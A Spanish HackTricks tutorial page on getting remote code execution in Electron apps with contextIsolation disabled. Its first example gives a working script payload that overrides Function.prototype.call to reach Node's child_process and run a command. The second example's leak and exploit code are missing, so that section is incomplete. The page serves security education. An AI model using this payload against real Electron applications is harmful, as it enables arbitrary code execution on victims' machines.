Electron contextIsolation RCE via Electron internal code

Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

Ejemplo 1

Ejemplo de https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41

El listener del evento "exit" siempre se establece por el código interno cuando se inicia la carga de la página. Este evento se emite justo antes de la navegación:

process.on('exit', function (){
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})

https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- Ya no existe

Luego va aquí:

Donde "self" es el objeto de proceso de Node:

El objeto de proceso tiene una referencia a la función "require":

process.mainModule.require

Como el handler.call va a recibir el objeto de proceso, podemos sobrescribirlo para ejecutar código arbitrario:

<script>
Function.prototype.call = function(process){
process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>

Ejemplo 2

Obtener objeto require de la contaminación del prototipo. De https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81

Fuga:

Explotar:

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

PreviousElectron contextIsolation RCE via preload code NextElectron contextIsolation RCE via IPC

Last updated 4 months ago